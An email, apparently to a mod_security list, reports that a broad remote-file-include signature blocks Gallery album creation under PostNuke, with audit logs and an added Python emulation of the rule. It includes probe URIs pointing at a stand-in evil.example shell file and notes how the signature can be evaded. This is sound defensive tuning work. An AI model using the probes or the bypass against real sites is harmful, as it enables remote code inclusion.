<html>
<head>
<meta http-equiv=Content-Type content="text/html; charset=us-ascii">
<meta name=Generator content="Microsoft Word 11 (filtered)">
<style>
<!--
/* Font Definitions */
@font-face
        {font-family:Verdana;
        panose-1:2 11 6 4 3 5 4 4 2 4;}
/* Style Definitions */
p.MsoNormal, li.MsoNormal, div.MsoNormal
        {margin:0in;
        margin-bottom:.0001pt;
        font-size:12.0pt;
        font-family:"Times New Roman";}
a:link, span.MsoHyperlink
        {color:blue;
        text-decoration:underline;}
a:visited, span.MsoHyperlinkFollowed
        {color:purple;
        text-decoration:underline;}
pre
        {margin:0in;
        margin-bottom:.0001pt;
        font-size:10.0pt;
        font-family:"Courier New";}
span.EmailStyle17
        {font-family:Verdana;
        color:black;}
@page Section1
        {size:8.5in 11.0in;
        margin:1.0in 1.25in 1.0in 1.25in;}
div.Section1
        {page:Section1;}
-->
</style>
</head>
<body lang=EN-US link=blue vlink=purple>
<div class=Section1>
<p class=MsoNormal><font size=2 color=black face=Verdana><span
style='font-size:10.0pt;font-family:Verdana;color:black'>This rule:</span></font></p>
<p class=MsoNormal><font size=2 color=black face=Verdana><span
style='font-size:10.0pt;font-family:Verdana;color:black'> </span></font></p>
<pre><font size=2 face="Courier New"><span style='font-size:10.0pt'>#really broad furl_fopen attack sig</span></font></pre><pre><font
size=2 face="Courier New"><span style='font-size:10.0pt'>#tune this for your system</span></font></pre><pre><font
size=2 face="Courier New"><span style='font-size:10.0pt'>SecFilterSelective REQUEST_URI "!(banner_click|wp-login|tiki-view_cache|/horde/index|/horde/services/go|/goto|gallery2?/main)" chain</span></font></pre><pre><font
size=2 face="Courier New"><span style='font-size:10.0pt'>SecFilterSelective REQUEST_URI "\.php(3|4|5)?(\?|&).*=(ht|f)tps?:/.*(\?|&)"</span></font></pre>
<p class=MsoNormal><font size=2 color=black face=Verdana><span
style='font-size:10.0pt;font-family:Verdana;color:black'> </span></font></p>
<p class=MsoNormal><font size=2 color=black face=Verdana><span
style='font-size:10.0pt;font-family:Verdana;color:black'>Causes a false
positive when a Gallery user tries to create a new album. At least for those
that have Gallery embedded into PostNuke, which two of the domains on my server
do.</span></font></p>
<p class=MsoNormal><font size=2 color=black face=Verdana><span
style='font-size:10.0pt;font-family:Verdana;color:black'> </span></font></p>
<p class=MsoNormal><font size=2 color=black face=Verdana><span
style='font-size:10.0pt;font-family:Verdana;color:black'>Here are two audit
entries from two different users:</span></font></p>
<p class=MsoNormal><font size=2 color=black face=Verdana><span
style='font-size:10.0pt;font-family:Verdana;color:black'> </span></font></p>
<pre><font size=2 face="Courier New"><span style='font-size:10.0pt'>==a3a30c72==============================</span></font></pre><pre><font
size=2 face="Courier New"><span style='font-size:10.0pt'>Request: www.DOMAINA.com <IP ADDRESS> - - [10/Jun/2006:20:28:25 --0500] "GET /nuke/html/modules/gallery/do_command.php?return=http%3A%2F%2Fwww.DOMAINA.com%2Fnuke%2Fhtml%2Fmodules%2Fgallery%2Fview_album.php&cmd=new-album HTTP/1.1" 500 1402 "http://www.DOMAINA.com/nuke/html/modules/gallery/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" wAp60UIczXUAAFyP0c8AAAAM "-"</span></font></pre><pre><font
size=2 face="Courier New"><span style='font-size:10.0pt'>----------------------------------------</span></font></pre><pre><font
size=2 face="Courier New"><span style='font-size:10.0pt'>GET /nuke/html/modules/gallery/do_command.php?return=http%3A%2F%2Fwww.DOMAINA.com%2Fnuke%2Fhtml%2Fmodules%2Fgallery%2Fview_album.php&cmd=new-album HTTP/1.1</span></font></pre><pre><font
size=2 face="Courier New"><span style='font-size:10.0pt'>Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*</span></font></pre><pre><font
size=2 face="Courier New"><span style='font-size:10.0pt'>Referer: http://www.DOMAINA.com/nuke/html/modules/gallery/</span></font></pre><pre><font
size=2 face="Courier New"><span style='font-size:10.0pt'>Accept-Language: en-us</span></font></pre><pre><font
size=2 face="Courier New"><span style='font-size:10.0pt'>Accept-Encoding: gzip, deflate</span></font></pre><pre><font
size=2 face="Courier New"><span style='font-size:10.0pt'>User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)</span></font></pre><pre><font
size=2 face="Courier New"><span style='font-size:10.0pt'>Host: www.DOMAINA.com</span></font></pre><pre><font
size=2 face="Courier New"><span style='font-size:10.0pt'>Connection: Keep-Alive</span></font></pre><pre><font
size=2 face="Courier New"><span style='font-size:10.0pt'>Cookie: POSTNUKESID=f4a0458a85a5ff7cc62c85510811469f; POSTNUKESID=aec2dac49a491e304beaa804257b632d; phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3BN%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D; gallery_session_add_photos_mode=form; phpbb2mysql_sid=5c52ed124857e5d615753e6bd65d0421; phpbb2mysql_t=a%3A3%3A%7Bi%3A1057%3Bi%3A1149827453%3Bi%3A114%3Bi%3A1149861963%3Bi%3A1058%3Bi%3A1149862021%3B%7D; PHPSESSID=aa50a71cddfcc06039a7a5d6dfe368c4; testing=1; sid=8c8eb42eadfcdc742030e34513a7e951</span></font></pre><pre><font
size=2 face="Courier New"><span style='font-size:10.0pt'>mod_security-action: 500</span></font></pre><pre><font
size=2 face="Courier New"><span style='font-size:10.0pt'>mod_security-message: Access denied with code 500. Pattern match "\\.php(3|4|5)?(\\?|&).*=(ht|f)tps?:/.*(\\?|&)" at REQUEST_URI</span></font></pre><pre><font
size=2 face="Courier New"><span style='font-size:10.0pt'> </span></font></pre><pre><font
size=2 face="Courier New"><span style='font-size:10.0pt'>HTTP/1.1 500 Internal Server Error</span></font></pre><pre><font
size=2 face="Courier New"><span style='font-size:10.0pt'>Last-Modified: Tue, 06 Sep 2005 04:00:25 GMT</span></font></pre><pre><font
size=2 face="Courier New"><span style='font-size:10.0pt'>ETag: "134043-57a-77bb0840"</span></font></pre><pre><font
size=2 face="Courier New"><span style='font-size:10.0pt'>Accept-Ranges: bytes</span></font></pre><pre><font
size=2 face="Courier New"><span style='font-size:10.0pt'>Content-Length: 1402</span></font></pre><pre><font
size=2 face="Courier New"><span style='font-size:10.0pt'>Connection: close</span></font></pre><pre><font
size=2 face="Courier New"><span style='font-size:10.0pt'>Content-Type: text/html</span></font></pre><pre><font
size=2 face="Courier New"><span style='font-size:10.0pt'>--a3a30c72--</span></font></pre>
<p class=MsoNormal><font size=2 color=black face=Verdana><span
style='font-size:10.0pt;font-family:Verdana;color:black'> </span></font></p>
<p class=MsoNormal><font size=2 color=black face=Verdana><span
style='font-size:10.0pt;font-family:Verdana;color:black'> </span></font></p>
<pre><font size=2 face="Courier New"><span style='font-size:10.0pt'>==c164ef16==============================</span></font></pre><pre><font
size=2 face="Courier New"><span style='font-size:10.0pt'>Request: morrowind.DOMAINB.com <IP ADDRESS> - - [10/Jun/2006:20:23:27 --0500] "GET /modules/gallery/do_command.php?return=http%3A%2F%2Fmorrowind.DOMAINB.com%2Fmodules%2Fgallery%2Fview_album.php&cmd=new-album HTTP/1.1" 500 1408 "http://morrowind.DOMAINB.com/modules/gallery/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" rkLfukIczXUAAAY8gMAAAAAI "-"</span></font></pre><pre><font
size=2 face="Courier New"><span style='font-size:10.0pt'>----------------------------------------</span></font></pre><pre><font
size=2 face="Courier New"><span style='font-size:10.0pt'>GET /modules/gallery/do_command.php?return=http%3A%2F%2Fmorrowind.DOMAINB.com%2Fmodules%2Fgallery%2Fview_album.php&cmd=new-album HTTP/1.1</span></font></pre><pre><font
size=2 face="Courier New"><span style='font-size:10.0pt'>Accept: */*</span></font></pre><pre><font
size=2 face="Courier New"><span style='font-size:10.0pt'>Referer: http://morrowind.DOMAINB.com/modules/gallery/</span></font></pre><pre><font
size=2 face="Courier New"><span style='font-size:10.0pt'>Accept-Language: en-us</span></font></pre><pre><font
size=2 face="Courier New"><span style='font-size:10.0pt'>Accept-Encoding: gzip, deflate</span></font></pre><pre><font
size=2 face="Courier New"><span style='font-size:10.0pt'>User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)</span></font></pre><pre><font
size=2 face="Courier New"><span style='font-size:10.0pt'>Host: morrowind.DOMAINB.com</span></font></pre><pre><font
size=2 face="Courier New"><span style='font-size:10.0pt'>Connection: Keep-Alive</span></font></pre><pre><font
size=2 face="Courier New"><span style='font-size:10.0pt'>Cookie: pnphpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%223%22%3B%7D; POSTNUKESID=df57897f8dcbe1c40eb870d8789843c5; PHPSESSID=34c42d9461125024a0929be9e98201a1</span></font></pre><pre><font
size=2 face="Courier New"><span style='font-size:10.0pt'>mod_security-action: 500</span></font></pre><pre><font
size=2 face="Courier New"><span style='font-size:10.0pt'>mod_security-message: Access denied with code 500. Pattern match "\\.php(3|4|5)?(\\?|&).*=(ht|f)tps?:/.*(\\?|&)" at REQUEST_URI</span></font></pre><pre><font
size=2 face="Courier New"><span style='font-size:10.0pt'> </span></font></pre><pre><font
size=2 face="Courier New"><span style='font-size:10.0pt'>HTTP/1.1 500 Internal Server Error</span></font></pre><pre><font
size=2 face="Courier New"><span style='font-size:10.0pt'>Last-Modified: Tue, 06 Sep 2005 04:01:49 GMT</span></font></pre><pre><font
size=2 face="Courier New"><span style='font-size:10.0pt'>ETag: "db401f-580-7cbcc540"</span></font></pre><pre><font
size=2 face="Courier New"><span style='font-size:10.0pt'>Accept-Ranges: bytes</span></font></pre><pre><font
size=2 face="Courier New"><span style='font-size:10.0pt'>Content-Length: 1408</span></font></pre><pre><font
size=2 face="Courier New"><span style='font-size:10.0pt'>Connection: close</span></font></pre><pre><font
size=2 face="Courier New"><span style='font-size:10.0pt'>Content-Type: text/html</span></font></pre><pre><font
size=2 face="Courier New"><span style='font-size:10.0pt'>--c164ef16--</span></font></pre>
<p class=MsoNormal><font size=2 color=black face=Verdana><span
style='font-size:10.0pt;font-family:Verdana;color:black'> </span></font></p>
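<p class=MsoNormal><font size=2 color=black face=Verdana><span
style='font-size:10.0pt;font-family:Verdana;color:black'>The two filters of the posted chain run against the request URIs from the audit entries above, as an added Python example that is not part of the original post and not mod_security's own code. It URL-decodes the URI first, because the audit log shows the rule firing on <tt>return=http%3A%2F%2F...</tt>, which can only match <tt>https?:/</tt> after mod_security 1.x's normalization step; it emulates the chain (deny only when the negated whitelist does not hit and the signature does); and it shows one hypothetical tuning, adding Gallery's <tt>do_command.php</tt> to the whitelist alternation. The <tt>evil.example</tt> probe URIs are constructed.</span></font></p>

```python
import re
from urllib.parse import unquote

# First filter of the posted chain: a negated ('!') whitelist. In mod_security 1.x
# the chain only continues when this regex does NOT match the normalized REQUEST_URI.
WHITELIST = re.compile(
    r"(banner_click|wp-login|tiki-view_cache|/horde/index|/horde/services/go|/goto|gallery2?/main)"
)
# Second filter: the broad remote-include signature from the post.
RFI_SIG = re.compile(r"\.php(3|4|5)?(\?|&).*=(ht|f)tps?:/.*(\?|&)")

# Hypothetical tuning (an assumption, not from the post): also exclude Gallery's
# do_command.php so its 'return=' redirect parameter no longer trips the signature.
TUNED_WHITELIST = re.compile(
    r"(banner_click|wp-login|tiki-view_cache|/horde/index|/horde/services/go|/goto|gallery2?/main"
    r"|gallery/do_command\.php)"
)


def normalize(uri):
    """mod_security 1.x URL-decodes REQUEST_URI before running filters; without
    this step 'return=http%3A%2F%2F...' could never match 'https?:/' and the rule
    would not have fired on the encoded URI recorded in the audit log."""
    return unquote(uri)


def chain_blocks(uri, whitelist=WHITELIST):
    """Emulate the chained pair: deny iff the whitelist does not match AND the
    signature matches. Returns True when the request would be denied."""
    u = normalize(uri)
    if whitelist.search(u):
        return False  # negated first filter failed -> chain stops, request passes
    return RFI_SIG.search(u) is not None


def matches_raw(uri):
    """The signature against the un-decoded URI, to show why normalization matters."""
    return RFI_SIG.search(uri) is not None


# Request URIs copied from the two audit entries above.
GALLERY_NEW_ALBUM = [
    "/nuke/html/modules/gallery/do_command.php?return=http%3A%2F%2Fwww.DOMAINA.com"
    "%2Fnuke%2Fhtml%2Fmodules%2Fgallery%2Fview_album.php&cmd=new-album",
    "/modules/gallery/do_command.php?return=http%3A%2F%2Fmorrowind.DOMAINB.com"
    "%2Fmodules%2Fgallery%2Fview_album.php&cmd=new-album",
]
# Constructed probes (not from the post). The signature insists on a '?' or '&'
# after the remote URL, the trailer include payloads usually carry so the rest of
# the query string is swallowed; a probe without that trailer slips past it.
RFI_PROBE = "/index.php?page=http://evil.example/shell.txt?&x=1"
RFI_PROBE_NO_TRAILER = "/index.php?page=http://evil.example/shell.txt"

if __name__ == "__main__":
    for uri in GALLERY_NEW_ALBUM + [RFI_PROBE, RFI_PROBE_NO_TRAILER]:
        print(f"raw={matches_raw(uri)!s:5} posted={chain_blocks(uri)!s:5} "
              f"tuned={chain_blocks(uri, TUNED_WHITELIST)!s:5} {uri[:60]}")
```

<p class=MsoNormal><font size=2 color=black face=Verdana><span
style='font-size:10.0pt;font-family:Verdana;color:black'>Two caveats on the tuning. Excluding a path exempts every request to that path, so an actual remote-include attempt aimed at <tt>do_command.php</tt> would pass the signature too; a narrower exclusion would anchor on <tt>return=</tt> pointing at the site's own host names, which in a mod_security 1.x regex means writing those names into the pattern. And the signature's trailing <tt>(\?|&)</tt> is both why it fires on the Gallery redirect (the <tt>&cmd=</tt> that follows) and why a bare <tt>?page=http://.../shell.txt</tt> with nothing after it is not caught.</span></font></p>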
</div>
</body>
</html>